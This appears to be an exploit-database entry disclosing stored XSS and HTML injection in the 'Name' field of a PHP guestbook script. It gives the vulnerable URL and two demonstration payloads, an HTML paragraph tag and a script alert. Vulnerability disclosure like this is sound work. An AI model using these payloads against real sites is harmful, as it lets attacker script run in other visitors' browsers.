header-logo
Suggest Exploit
vendor:
GuestBook Script PHP
by:
AnTi SeCuRe
8,8
CVSS
HIGH
XSS/HTML Injection
79 (XSS)
CWE
Product Name: GuestBook Script PHP
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

GuestBook Script PHP (XSS/HTML Injection) Multiple Vulnerabilities

The vulnerability exists in the 'Name' field of the 'Add a New Comment' form. An attacker can inject HTML or JavaScript code in the 'Name' field, which will be executed when the page is viewed by other users.

Mitigation:

Input validation should be used to prevent malicious code from being injected into the 'Name' field.
Source

Exploit-DB raw data:

=======================================================================
# GuestBook Script PHP (XSS/HTML Injection) Multiple Vulnerabilities
=======================================================================
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
#################################
#      _____ __    __  /_  __/  #
#     / ___/ \ \  / /   / /     #
#    (__  )   \ \/ /   / /      #
#   /____/     \__/   /_/       #
#################################
# Vendor: http://www.guestbookscripts.com/demo_guestbook.php
# Date: 2010-08-15
# Author: AnTi SeCuRe
# Greets: Sa-ViRuS.CoM , RENO , Dr.php , ! BaD BoY ! , Gov.HaCker , Dr.$audi all Sa-ViRuS.CoM Members ..
# Contact: AnTi-SeCuRe@HoTMaiL.CoM
# Home: WwW.Sa-ViRuS.CoM
########################################################################

[~]Note : Its not free ,, Its By 17,99
[~]You Can Buy It From : http://www.guestbookscripts.com/buy_guestbook.php


[~] HTML Injection Vuln . : http://server/demo_guestbook.php?act=new
Add A New Comment And The exploit is in Name :)
<p align="center"><b>Sa-ViRuS.CoM</b></p>



[~] Xss Vuln. : http://server/demo_guestbook.php?act=new
Add A New Comment And The exploit is in Name :)
<script>alert('AnTi SeCuRe - Sa-ViRuS.CoM')</script>



Thx To : Allah

Navigation

Suggest Exploit

Services By CQR